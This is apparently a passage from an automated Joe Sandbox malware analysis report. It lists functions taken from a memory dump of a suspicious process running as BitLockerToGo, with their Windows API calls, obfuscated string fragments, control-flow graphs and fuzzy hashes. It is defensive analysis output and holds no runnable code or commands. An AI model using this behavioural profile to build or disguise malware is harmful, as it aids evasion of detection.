                                                                                                                                                                                                            • Opcode ID: 82ede688b2b155f207d3fe4f7395420d55c6ff92fca177961a2d1e7af1c7a0b5
                                                                                                                                                                                                            • Instruction ID: e001d4929498538a0a8ecbb7f051c84920bd96f0897afdf19a85230a06394eb9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82ede688b2b155f207d3fe4f7395420d55c6ff92fca177961a2d1e7af1c7a0b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86617836A082145BE7249E28DC5177BB3A3EBC9710F1E943EDAC597345E6399C0187C5
                                                                                                                                                                                                            Function 0043DCE9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: D]+\
                                                                                                                                                                                                            • API String ID: 0-1174097187
                                                                                                                                                                                                            • Opcode ID: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
                                                                                                                                                                                                            • Instruction ID: 8b969df8764a6140270626732b9a31d532f0956a4ad419ee8c7d181fdb0ffe63
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1314878B482008BE7188F42E99073B73A6E7CE300F29753ED481172C6C2389C129B9E
                                                                                                                                                                                                            Function 004384F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: b869eca833a40c818396ee1e1d5dee7386a155d051680801a2248d55a6fec426
                                                                                                                                                                                                            • Instruction ID: 87dcadc3cc869a97b24ddec11b738d0474b7b08a840880998656ded9c4dd36b4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b869eca833a40c818396ee1e1d5dee7386a155d051680801a2248d55a6fec426
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9A1053250C3848FE3049B28895536BFBD29BDA318F29992EF0D557382DABDC545D70B
                                                                                                                                                                                                            Function 00418DF1 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 81659641f48af0cf2b9ea4007cec23b56981737a4bb24a2d2dad75840f1d429d
                                                                                                                                                                                                            • Instruction ID: 4f8d52657f7084f69bf055083d43b99a2f5dee74b0ad81f64ba48cb646f5989a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81659641f48af0cf2b9ea4007cec23b56981737a4bb24a2d2dad75840f1d429d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 467148B69043108BD724DF24DC917EB73A2EF85324F09493EE885873A1D73DA841D79A
                                                                                                                                                                                                            Function 0043FB80 Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
                                                                                                                                                                                                            • Instruction ID: 6d45d2c3cd36f3333d69d70c7c241f502430d0bdfbc6ce3510ca67b0fea4cfba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D614875A583015BDB148F18C851B2BB3A2EFDD310F19A43EE986873A5DB34DC15C74A
                                                                                                                                                                                                            Function 0042B842 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 570 42b842-42b84c 571 42b86b-42b8b6 call 43f450 570->571 572 42b84e-42b855 570->572 578 42b8c0-42b8e5 571->578 574 42b860-42b869 572->574 574->571 574->574 578->578 579 42b8e7-42b8f1 578->579 580 42b8f3-42b8fa 579->580 581 42b90b-42b942 GetComputerNameExA 579->581 582 42b900-42b909 580->582 583 42b946 581->583 582->581 582->582 583->583
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0042B875
                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                            • String ID: KHGN$v
                                                                                                                                                                                                            • API String ID: 2904949787-192462181
                                                                                                                                                                                                            • Opcode ID: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
                                                                                                                                                                                                            • Instruction ID: 6cc2bcf1cdf43af400e598cc500c9cf08bcf6da0c1c09473a882a53858423e11
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3021D17014C2858EDB218F35A860BFB7FE4DB9B344F58486ED0C9C3292CB39444A9B56
                                                                                                                                                                                                            Function 0042B840 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 584 42b840-42b8b6 call 43f450 589 42b8c0-42b8e5 584->589 589->589 590 42b8e7-42b8f1 589->590 591 42b8f3-42b8fa 590->591 592 42b90b-42b942 GetComputerNameExA 590->592 593 42b900-42b909 591->593 594 42b946 592->594 593->592 593->593 594->594
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0042B875
                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                            • String ID: KHGN$v
                                                                                                                                                                                                            • API String ID: 2904949787-192462181
                                                                                                                                                                                                            • Opcode ID: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
                                                                                                                                                                                                            • Instruction ID: 50f42b0a951807a88e86a22aae57dbd367c2f88d39f0ae760fbcdf6f8fc845ea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 001123B01482858FD7219F35E860BEB7FE4EB9B344F54482DD0C9C3251CB39484A9B92
                                                                                                                                                                                                            Function 0042B94D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID: bC
                                                                                                                                                                                                            • API String ID: 3545744682-4190571504
                                                                                                                                                                                                            • Opcode ID: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                                                                                                                                            • Instruction ID: e82d825c06ad02e345faf7a0e59537a249da3b56fbe03ec142442aa4babbea04
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5421053560D3E18BD7358F2594943FABBE1EF92300F59885EC8CA9B341CA794409CB96
                                                                                                                                                                                                            Function 0042B948 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID: bC
                                                                                                                                                                                                            • API String ID: 3545744682-4190571504
                                                                                                                                                                                                            • Opcode ID: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                                                                                                                                            • Instruction ID: 8a9ff360a492162640ec0ee52e10ad36b0c35468f5dd3550f358dda6bb680e87
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B21257660D3A0CBD734CF2094843BAB7E2EFC6300F55895EC8CA9B340CA745806CB96
                                                                                                                                                                                                            Function 0042B7AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID: KHGN
                                                                                                                                                                                                            • API String ID: 3545744682-1032087821
                                                                                                                                                                                                            • Opcode ID: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                                                                                                                                            • Instruction ID: 800fda513f984b05936c8cd62631b8339e5399499a0172a9c9d32c48e16ec2f1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F1129B41483858FD7219F35A8A0BFB7FE4DB9B344F54482DD0C9C3241CB39444A9B92
                                                                                                                                                                                                            Function 00409D5E Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 00409E1A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                            • Opcode ID: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                                                                                                                                            • Instruction ID: 794dd10beed9ab1fdd81d0f6796807d90850f10cc366af128ac51e95daa83683
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3110879A842508FC7188F25D8816A97FF1FB55325B19D0ADD491EB363C23CD846CB58
                                                                                                                                                                                                            Function 00436805 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetUserDefaultUILanguage.KERNELBASE ref: 00436831
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DefaultLanguageUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 95929093-0
                                                                                                                                                                                                            • Opcode ID: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                                                                                                                                            • Instruction ID: c1e6da90ff38b23c1098b9489220249bba1124fa0f23aac35cb26dcf4f2101a0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31110434908686CFC719DB3888512A8BFB27F6B304F05839CC48D873A2DB35A954CF22
                                                                                                                                                                                                            Function 0042DE0C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BlanketProxy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3890896728-0
                                                                                                                                                                                                            • Opcode ID: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                                                                                                                                            • Instruction ID: eb4d188fa3b2335ac580bcc65c14ba02f7638069044a76079abd789a2c862b60
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8F0E2B56097028FE301DF25C55874BBBE6BBC8314F25891CE0A44B751C7B9AA898FC2
                                                                                                                                                                                                            Function 004316B2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BlanketProxy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3890896728-0
                                                                                                                                                                                                            • Opcode ID: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                                                                                                                                            • Instruction ID: 6701a38e9beb56b1775abd9ce08e5b6b7616d16b42eebe8ce345441057ef8d6a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBF074B46093029FE354DF69D5A871BBBE1EB88304F11881DE5958B390D7B59648CF82
                                                                                                                                                                                                            Function 0040C660 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C673
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                                                            • Opcode ID: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                                                                                                                                            • Instruction ID: a6b7534e426cd29cb0e1e31caee4a3ce77516a25d8fe1d9d75e6d40f069d1f8c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBE0C236E506442BD6046B1CDC47F8A3A1AC3C3726F4C8234A550CA2C5E938B910C15E
                                                                                                                                                                                                            Function 0040C69E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C6B0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeSecurity
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 640775948-0
                                                                                                                                                                                                            • Opcode ID: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
                                                                                                                                                                                                            • Instruction ID: ca338ed000cba09c134a9ecbf479b52692d88648cc8417c010cf118771328cdf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DE05E39BD47406BFA385B08DC13F4422129386F21F388224B310EE7D9C8A8B501420C
                                                                                                                                                                                                            Function 0043E6A5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0043E6A5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ForegroundWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2020703349-0
                                                                                                                                                                                                            • Opcode ID: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
                                                                                                                                                                                                            • Instruction ID: eb5cd64e0cd090f695d5de900f82e4eebcc02a3ea27d0b2ee91ac1c0039229b8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BC012EC9084808BC248EB12EC4252A3B5EAA8A209B049038D80B02B23E9306805968A
                                                                                                                                                                                                            Function 0043BCB0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000,00000000,0043D8F6,?,?,?,00000000,0040B40D,00000000,00000000), ref: 0043BCCE
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                            • Opcode ID: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
                                                                                                                                                                                                            • Instruction ID: 6c6d5fcf156c4dc9181b7fd85535f9ef3000d663acf77e4cc9904710c0b9b036
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AED01231405122EBC7241F18FD06B873B64DF0A321F030472B8006B071C664EC519AD8
                                                                                                                                                                                                            Function 0043BC90 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,00408797,2D2C008A), ref: 0043BCA0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                            • Opcode ID: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
                                                                                                                                                                                                            • Instruction ID: 28c2b2b5d3f1f64fcd0aca9316f6b1f640d95bbb8965ee836e226e74b875d2a4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DBC09B31445121ABC6142B15FD05FC67F64DF45355F114066B40467073C770AC41D6D8

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00436DB2 Relevance: 37.8, Strings: 30, Instructions: 257COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: -$/$8$;$;$A$C$E$G$I$J$K$M$O$a$c$e$g$i$k$m$o$q$s$u$w$y${$}$~
                                                                                                                                                                                                            • API String ID: 0-1589385449
                                                                                                                                                                                                            • Opcode ID: 08dd65442de94eabfc3cdf6d35326c8f72eb4104f2c4c18c14e31ef637717d18
                                                                                                                                                                                                            • Instruction ID: 1b177812bac92343aee33b27717da1fbbd16d72b67d831a1239cd13586a5dfd8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08dd65442de94eabfc3cdf6d35326c8f72eb4104f2c4c18c14e31ef637717d18
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28B1A2616087D18ED726CE3C88883467F911B66224F1D83E9D8F99F3DBC2A9C946C365
                                                                                                                                                                                                            Function 00433960 Relevance: 34.1, APIs: 1, Strings: 18, Instructions: 837COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object
                                                                                                                                                                                                            • String ID: $IC$%*+($%MC$($)OC$4KC$;JC$FQC$JHC$MOC$NRC$gQC$nOC$xPC$}LC$EC$JC$LC
                                                                                                                                                                                                            • API String ID: 2936123098-1372895061
                                                                                                                                                                                                            • Opcode ID: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
                                                                                                                                                                                                            • Instruction ID: 36275d4299c1cc8a6f4b0a2dda9d59d0b137285972a6756889d8cf952a04f1ae
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF82A2F0E163249FDB998F18DC51B9ABBF9AB49744F2040DEA00DE7350CB761A818F59
                                                                                                                                                                                                            Function 0040ED75 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 701COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(?), ref: 0040F4B9
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                            • String ID: 2$7$9$H$H$V$j$v
                                                                                                                                                                                                            • API String ID: 237503144-1978986865
                                                                                                                                                                                                            • Opcode ID: 4be2ad93ad263aa24791d851425d7f447bfb02ac2ebeaf19bb492b4805c9857a
                                                                                                                                                                                                            • Instruction ID: 82d8f7b26a8b2fa1bbcf6840c7d4f9747383a6517706711a2926001e1f175bd0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be2ad93ad263aa24791d851425d7f447bfb02ac2ebeaf19bb492b4805c9857a
